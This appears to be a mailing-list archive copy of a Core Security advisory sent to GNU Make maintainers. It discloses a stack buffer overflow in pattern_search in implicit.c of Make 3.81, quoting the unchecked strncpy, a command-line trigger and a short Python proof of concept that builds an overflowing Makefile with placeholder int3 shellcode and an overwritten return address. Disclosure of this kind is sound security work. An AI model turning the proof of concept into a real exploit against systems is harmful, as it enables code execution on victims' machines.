bug-make
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

GNU-make filename buffer overflow


From: Core Security Advisories Team (CS)
Subject: GNU-make filename buffer overflow
Date: Mon, 30 Jun 2008 18:25:09 -0300

Hello,

Alfredo Ortega from Core Security Technologies has found that GNU Make is vulnerable to a stack buffer overflow.

We would like to receive information about your plans for fixing this bug. Technical details follow.

Affected software: GNU Make-3.81 and before.

The security impact of this bug is very low, because Makefiles already
contain the functionality to execute arbitrary code.

The bug resides in the following code at implicit.c:

 199    static int
 200    pattern_search (struct file *file, int archive,
 201                unsigned int depth, unsigned int recursions)
 202    {
 203    /* Filename we are searching for a rule for.  */
 204    char *filename = archive ? strchr (file->name, '(') : file->name;

 ...

 271   PATH_VAR (stem_str); /* @@ Need to get rid of stem, stemlen,
 etc. */

 ...

 470          if (check_lastslash)
 471            {
 472              stem += lastslash - filename + 1;
 473              stemlen -= (lastslash - filename) + 1;
 474            }
 475
 476          DBS (DB_IMPLICIT, (_("Trying pattern rule with stem
 `%.*s'.\n"),
 477                                 (int) stemlen, stem));
 478
 479              strncpy (stem_str, stem, stemlen);
 480              stem_str[stemlen] = '\0';

 Here, in line 271 the program is allocating a fixed-length variable on
 the stack (using the macro PATH_VAR), but in line 479 the filename is
 being copied to this buffer without any length-checking.

 An easy way to trigger the bug is via command-line arguments.
 For example:

     $ make AAAAAA... (10000 A's)

 Also, the bug can be triggered from inside Makefiles.
 The following Proof of Concept triggers a Int3 on a FreeBSD-6.2-RELEASE
 system. Other software may be vulnerable.

 -------
 #Alfredo A. Ortega - Core Security Exploit Writers Team (EWT)
 #GNU Make stack overflow
 #This Python script generates a Makefile that trigger the overflow
 #and executes a int3 instruction (SIGTRAP)
 #Tested on FreeBSD-6.2-RELEASE
 #usage: python makeexploit.py >Makefile;gmake

 import os
 #ShellCode placeholder
 overflow='\xcc'*1052
 #Address
 overflow+='\xbf'*4
 print "all: %s" % overflow
 -------

Thanks in advance,
-Carlos

--
Carlos Sarraute
Advisories Team
Core Security Technologies
www.coresecurity.com





reply via email to

[Prev in Thread] Current Thread [Next in Thread]